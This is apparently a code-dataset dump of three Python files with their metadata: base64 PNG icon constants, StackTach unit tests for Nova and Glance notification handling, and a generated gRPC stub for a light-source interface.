minimizeicon = b'iVBORw0KGgoAAAANSUhEUgAAABoAAAAaCAYAAAHeTXxYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAGhSURBVDhP5ZVLSsRAEIZ7xH02QsAD9E7P4RXmNDNewW0O4A08QBbuFTcJZDOgISiYBHSr9XdX13Q6DzJxEMQPkq5KVXWqu/qh5lEUxd0XweoUzi3LsqcT/0OHFV5DlhVhhNCI/tBKZJ7nj5CB1vpSIgehAI0onw8Chg37CDCa3IcQA7wAq+oUr7quX11mlPID2lEkX+pFU7O22jA0vGsWTcDG/NwGDtK27TscIHdGQz3lLPYoy/KZxW7QXHpBSZJcYSb8h019Pgkzqgl2u90Fux+OP+W9ugfcdiZqTmrMviTQUAdWe8AZPoTJRmbPr0NIWL/j1GkOxwniAQs4XdgkmM3k4293kKbpDYuCnA1owwBHHMfnURSdkbiVPYU1ZXKZwBwXfw8M7YC1OwqGH269cDdtraZU0zRvVVW9sDoLrzCOfYEc+JFJh6CTxFwJS0AsdwPkKFi0wpfwD39E84zDDvWbekYvtB4cYPAXA239e/48CnzYfXQxCPhobfY4p2Z+lgxi3JXMDP5IY6NZ+8/hviRZ2bAONq6ttpjuVfl7KPUNiaiVDPThZ8EAAAAASUVORK5CYII='
refresh = b'iVBORw0KGgoAAAANSUhEUgAAABwAAAAcCAYAAAEFCu8CAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAJqSURBVDhP7ZVPSFRRFIfnSc1GUBehi5BMosKFLVoW6EIoUwYRBNfhokDduZAW6rJNq1q4ELdtWxgxEKSGiAvbCFEq0yLCP422SRB1pu8377znm5nnmzFdDOgPPs65Z867b+65574bO4Oy2WzC3ICINpudzAXyRHTQXFcE7sAf+AZVFi4hMqeh14Yar5lbhshOwj68gGkL535Imyu/HbI2PKV4sEY2tx4GGdmAHph1RcINGIWrFjonMWMvbMNtiEMV1MEb2AB/hY5ZPdSBSTmOs+5GjsVvY+bG+H3C3DOKWbWfnsYt7IuYA1uyGhe2yU2Yh6ckDEAnTMIOsSf8zXr4z52sDLEW7ds4rMIB/Ib30AzXYMBSi4qzCXG4b/Y6jMAy9EF+L0rMNgddNvRFrAly5wL5B8frcu3NEqWe0bhATdAG2tt3ClS4WI4qbqNAVbVyTxYq1CsYct2A7JkU+EfNE7Eu2ITC7fMfVFPvwBQ8BjX6GixYmq+w2a9gOqEVdiHJNp3ik1lpKlpimFi2PqfqvBZoBH2Uj0Al+AUr8JNSHGIjVbwrAfGiBCziboHa/xHswRf4Cqq/rqs50GdsHrTjOk/S8SV0kkhSQ3aDJvgO2tCSIk/fzj74ARmQol9Igh4aBr1MDV2WyB2DMJW1QlEDkeW+1EkKO/k9mHvuKE+ztP0n8yPFHLcwz+ADfIy8S0kO3uSvQdeF0DksKfJ0lNIwC7rYo0WS98LnsAG7oBe3QB3EQd2s4yO/Fu7CS9Atqg5P2HRFCiuprlrdmrpF06CV9cNDUKkaoBpUpr+wDSn4DG9hnRJmsBdSsdg/hcMop1Uszc4AAAAASUVORK5CYII='
avg_line_length: 953 | max_line_length: 1,158 | alphanum_fraction: 0.96887
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 77 | 2,859 | 35.974026 | 0.974026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146615 | 0.002798 | 2,859 | 3 | 1,159 | 953 | 0.824974 | 0 | 0 | 0 | 0 | 1 | 0.983217 | 0.983217 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0
unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 8

hexsha: 037fa9ffe173e66b19b1f49528313e0505b49367 | size: 28,406 | ext: py | lang: Python
max_stars: tests/unit/test_notification.py in PreetiKamble29/stacktach (head f4f905393a0d7eaa226a72b6a27b61e4ef52211d), licenses ["Apache-2.0"], max_stars_count null, stars events null
max_issues: same path, repo, and head, licenses ["Apache-2.0"], max_issues_count 4, issues events 2020-02-28T10:27:34.000Z to 2022-02-02T01:13:09.000Z
max_forks: same path, repo, and head, licenses ["Apache-2.0"], max_forks_count null, forks events null
content:
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import mox
from stacktach import notification, stacklog
from stacktach import utils
from stacktach.notification import Notification
from stacktach.notification import NovaNotification
from stacktach.notification import GlanceNotification
from stacktach import db
from stacktach import image_type
from tests.unit import StacktachBaseTestCase
from tests.unit.utils import BANDWIDTH_PUBLIC_OUTBOUND
from tests.unit.utils import REQUEST_ID_1
from tests.unit.utils import DECIMAL_DUMMY_TIME
from tests.unit.utils import DUMMY_TIME
from tests.unit.utils import TIMESTAMP_1
from tests.unit.utils import TENANT_ID_1
from tests.unit.utils import INSTANCE_ID_1
from tests.unit.utils import MESSAGE_ID_1
class NovaNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_factory_should_return_nova_notification_for_nova_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "monitor.info"
self.mox.StubOutWithMock(notification, 'NovaNotification')
notification.NovaNotification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'nova')
self.mox.VerifyAll()
def test_factory_should_return_glance_notification_for_glance_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "monitor_glance.info"
self.mox.StubOutWithMock(notification, 'GlanceNotification')
notification.GlanceNotification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'glance')
self.mox.VerifyAll()
def test_factory_should_return_notification_for_unknown_exchange(
self):
body = {}
deployment = "1"
json = "{}"
routing_key = "unknown.info"
self.mox.StubOutWithMock(notification, 'Notification')
notification.Notification(body, deployment, routing_key, json)
self.mox.ReplayAll()
notification.notification_factory(body, deployment, routing_key, json,
'unknown_exchange')
self.mox.VerifyAll()
def test_save_should_persist_nova_rawdata_to_database(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task',
"bandwidth": {
"private": {"bw_in": 0, "bw_out": 264902},
"public": {"bw_in": 0, "bw_out": 1697240969}
}
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_nova_rawdata')
db.create_nova_rawdata(
deployment="1",
tenant=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix(TIMESTAMP_1),
publisher="compute.global.preprod-ord.ohthree.com",
event="compute.instance.exists",
service="compute",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1,
image_type=image_type.get_numeric_code(body['payload']),
old_state='old_state',
old_task='old_task',
os_architecture='os_arch',
os_distro='os_distro',
os_version='os_version',
rax_options='rax_opt',
state='state',
task='task').AndReturn(raw)
self.mox.ReplayAll()
notification = NovaNotification(body, deployment, routing_key, json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_bandwidth_public_out_is_read_from_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task',
"bandwidth": {
"private": {"bw_in": 0, "bw_out": 264902},
"public": {"bw_in": 0, "bw_out": BANDWIDTH_PUBLIC_OUTBOUND}
}
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out,
BANDWIDTH_PUBLIC_OUTBOUND)
def test_bandwidth_public_out_is_set_to_0_if_not_found_in_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task'
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out, 0)
def test_bandwidth_public_out_is_set_to_blank_object_if_none_in_json(self):
body = {
"event_type": "compute.instance.exists",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "compute.global.preprod-ord.ohthree.com",
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"properties": {
"image_type": "snapshot",
},
"bandwidth": None,
"tenant": "5877054",
"old_state": 'old_state',
"old_task_state": 'old_task',
"image_meta": {
"org.openstack__1__architecture": 'os_arch',
"org.openstack__1__os_distro": 'os_distro',
"org.openstack__1__os_version": 'os_version',
"com.rackspace__1__options": 'rax_opt',
},
"state": 'state',
"new_task_state": 'task'
}
}
deployment = "1"
routing_key = "monitor.info"
json_body = json.dumps([routing_key, body])
notification = NovaNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.bandwidth_public_out, 0)
class GlanceNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_should_persist_glance_rawdata_to_database(self):
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 17:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"status": "saving",
"properties": {
"image_type": "snapshot",
"instance_uuid": INSTANCE_ID_1,
},
"owner": TENANT_ID_1,
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 17:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id='',
image_type=0,
status="saving",
uuid="2df2ccf6-bc1b-4853-aab0-25fda346b3bb").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_save_should_persist_glance_rawdata_erro_payload_to_database(self):
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 17:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": "error_message"
}
deployment = "1"
routing_key = "glance_monitor.error"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner=None,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 17:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=None,
request_id='',
image_type=None,
status=None,
uuid=None).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
def test_save_usage_should_persist_image_usage(self):
raw = self.mox.CreateMockAnything()
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.upload",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"created_at": str(DUMMY_TIME),
"size": size,
"owner": TENANT_ID_1,
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_usage')
db.create_image_usage(
created_at=utils.str_time_to_unix(str(DUMMY_TIME)),
owner=TENANT_ID_1,
last_raw=raw,
size=size,
uuid=uuid).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_usage(raw)
self.mox.VerifyAll()
def test_save_delete_should_persist_image_delete(self):
raw = self.mox.CreateMockAnything()
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
deleted_at = "2013-06-20 14:31:57.939614"
body = {
"event_type": "image.delete",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"id": "2df2ccf6-bc1b-4853-aab0-25fda346b3bb",
"deleted_at": deleted_at
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_delete')
db.create_image_delete(
raw=raw,
uuid=uuid,
deleted_at=utils.str_time_to_unix(deleted_at)).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_delete(raw)
self.mox.VerifyAll()
class NotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_should_persist_generic_rawdata_to_database(self):
body = {
"event_type": "image.upload",
'_context_request_id': REQUEST_ID_1,
'_context_project_id': TENANT_ID_1,
"timestamp": TIMESTAMP_1,
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": MESSAGE_ID_1,
"payload": {
'instance_id': INSTANCE_ID_1,
"status": "saving",
"container_format": "ovf",
"tenant": "5877054"
}
}
deployment = "1"
routing_key = "generic_monitor.info"
json_body = json.dumps([routing_key, body])
raw = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(db, 'create_generic_rawdata')
db.create_generic_rawdata(
deployment="1",
tenant=TENANT_ID_1,
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix(TIMESTAMP_1),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.upload",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1,
message_id=MESSAGE_ID_1).AndReturn(raw)
self.mox.ReplayAll()
notification = Notification(body, deployment, routing_key, json_body)
self.assertEquals(notification.save(), raw)
self.mox.VerifyAll()
class GlanceExistsNotificationTestCase(StacktachBaseTestCase):
def setUp(self):
self.mox = mox.Mox()
def tearDown(self):
self.mox.UnsetStubs()
def test_save_glancerawdata(self):
raw = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": str(DUMMY_TIME),
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_glance_rawdata')
db.create_glance_rawdata(
deployment="1",
owner="testtenantid1",
json=json_body,
routing_key=routing_key,
when=utils.str_time_to_unix("2013-06-20 18:31:57.939614"),
publisher="glance-api01-r2961.global.preprod-ord.ohthree.com",
event="image.exists",
service="glance-api01-r2961",
host="global.preprod-ord.ohthree.com",
instance=None,
request_id='',
image_type=0,
status=None,
uuid=None).AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save()
self.mox.VerifyAll()
def test_save_image_exists_with_created_at_but_deleted_at_none(self):
raw = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": "d14cfa51-6a0e-4cf8-9130-804738be96d2",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_exists')
self.mox.StubOutWithMock(db, 'get_image_usage')
for i in range(0, 2):
db.get_image_usage(uuid=uuid).AndReturn(None)
db.create_image_exists(
created_at=utils.str_time_to_unix(created_at),
owner=TENANT_ID_1,
raw=raw,
audit_period_beginning=utils.str_time_to_unix(audit_period_beginning),
audit_period_ending=utils.str_time_to_unix(audit_period_ending),
size=size,
uuid=uuid,
usage=None,
message_id="d14cfa51-6a0e-4cf8-9130-804738be96d2").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_image_exists_with_created_at_and_deleted_at(self):
raw = self.mox.CreateMockAnything()
delete = self.mox.CreateMockAnything()
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
created_at = "2013-05-20 19:31:57.939614"
deleted_at = "2013-05-20 21:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"message_id": "d14cfa51-6a0e-4cf8-9130-804738be96d2",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": deleted_at,
},
{
"created_at": created_at,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": deleted_at,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(db, 'create_image_exists')
self.mox.StubOutWithMock(db, 'get_image_usage')
self.mox.StubOutWithMock(db, 'get_image_delete')
for i in range(0, 2):
db.get_image_usage(uuid=uuid).AndReturn(None)
db.get_image_delete(uuid=uuid).AndReturn(delete)
db.create_image_exists(
created_at=utils.str_time_to_unix(created_at),
owner=TENANT_ID_1,
raw=raw,
audit_period_beginning=utils.str_time_to_unix(audit_period_beginning),
audit_period_ending=utils.str_time_to_unix(audit_period_ending),
size=size,
uuid=uuid,
usage=None,
delete=delete,
deleted_at=utils.str_time_to_unix(deleted_at),
message_id="d14cfa51-6a0e-4cf8-9130-804738be96d2").AndReturn(raw)
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_image_exists_without_created_at(self):
raw = self.mox.CreateMockAnything()
raw.id = 1
audit_period_beginning = "2013-05-20 17:31:57.939614"
audit_period_ending = "2013-06-20 17:31:57.939614"
size = 123
uuid = "2df2ccf6-bc1b-4853-aab0-25fda346b3bb"
body = {
"event_type": "image.exists",
"timestamp": "2013-06-20 18:31:57.939614",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": {
"audit_period_beginning": audit_period_beginning,
"audit_period_ending": audit_period_ending,
"owner": TENANT_ID_1,
"images":
[
{
"created_at": None,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
},
{
"created_at": None,
"id": uuid,
"size": size,
"status": "saving",
"properties": {"instance_uuid": INSTANCE_ID_1},
"deleted_at": None,
}
]
}
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(stacklog, 'warn')
stacklog.warn("Ignoring exists without created_at. GlanceRawData(1)")
stacklog.warn("Ignoring exists without created_at. GlanceRawData(1)")
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
def test_save_exists_should_log_warning_when_payload_is_invalid(self):
raw = self.mox.CreateMockAnything()
raw.id = 1
body = {
"event_type": "image.exists",
"publisher_id": "glance-api01-r2961.global.preprod-ord.ohthree.com",
"payload": []
}
deployment = "1"
routing_key = "glance_monitor.info"
json_body = json.dumps([routing_key, body])
self.mox.StubOutWithMock(stacklog, 'warn')
stacklog.warn("Received exists with invalid payload GlanceRawData(1)")
self.mox.ReplayAll()
notification = GlanceNotification(body, deployment, routing_key,
json_body)
notification.save_exists(raw)
self.mox.VerifyAll()
avg_line_length: 38.700272 | max_line_length: 86 | alphanum_fraction: 0.547032
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 2,843 | 28,406 | 5.182202 | 0.086177 | 0.030883 | 0.020362 | 0.037467 | 0.853662 | 0.826105 | 0.804181 | 0.775742 | 0.754022 | 0.732845 | 0 | 0.053364 | 0.346899 | 28,406 | 733 | 87 | 38.75307 | 0.740783 | 0.026544 | 0 | 0.739663 | 0 | 0 | 0.226235 | 0.081708 | 0 | 0 | 0 | 0 | 0.01072 | 1 | 0.038285 | false | 0 | 0.027565 | 0 | 0.071976 | 0
unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 7

hexsha: 03abf0a2fefc3cab75cf4c8fb666d8ef0115bd0b | size: 4,736 | ext: py | lang: Python
max_stars: instrosetta/interfaces/light/light_source_pb2_grpc.py in jmosbacher/instrosetta-python (head b323ee4d3db0b7d8e22ec731dac521c967e5323d), licenses ["MIT"], max_stars_count null, stars events null
max_issues: same path, repo, and head, licenses ["MIT"], max_issues_count null, issues events null
max_forks: same path, repo, and head, licenses ["MIT"], max_forks_count null, forks events null
content:
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from instrosetta.interfaces.light import light_source_pb2 as instrosetta_dot_interfaces_dot_light_dot_light__source__pb2
class LightSourceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Initialize = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/Initialize',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeResponse.FromString,
)
self.Shutdown = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/Shutdown',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownResponse.FromString,
)
self.GetPower = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/GetPower',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerResponse.FromString,
)
self.SetPower = channel.unary_unary(
'/instrosetta.interfaces.light.light_source.v1.LightSource/SetPower',
request_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerRequest.SerializeToString,
response_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerResponse.FromString,
)
class LightSourceServicer(object):
# missing associated documentation comment in .proto file
pass
def Initialize(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Shutdown(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetPower(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_LightSourceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Initialize': grpc.unary_unary_rpc_method_handler(
servicer.Initialize,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.InitializeResponse.SerializeToString,
),
'Shutdown': grpc.unary_unary_rpc_method_handler(
servicer.Shutdown,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.ShutdownResponse.SerializeToString,
),
'GetPower': grpc.unary_unary_rpc_method_handler(
servicer.GetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.GetPowerResponse.SerializeToString,
),
'SetPower': grpc.unary_unary_rpc_method_handler(
servicer.SetPower,
request_deserializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerRequest.FromString,
response_serializer=instrosetta_dot_interfaces_dot_light_dot_light__source__pb2.SetPowerResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'instrosetta.interfaces.light.light_source.v1.LightSource', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
avg_line_length: 48.326531 | max_line_length: 127 | alphanum_fraction: 0.796875
quality signals (qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal, in schema order): 513 | 4,736 | 6.888889 | 0.152047 | 0.076967 | 0.071307 | 0.129881 | 0.810696 | 0.810696 | 0.810696 | 0.753537 | 0.753537 | 0.739672 | 0 | 0.005636 | 0.138302 | 4,736 | 97 | 128 | 48.824742 | 0.860328 | 0.095228 | 0 | 0.30137 | 1 | 0 | 0.126761 | 0.075587 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082192 | false | 0.082192 | 0.027397 | 0 | 0.136986 | 0
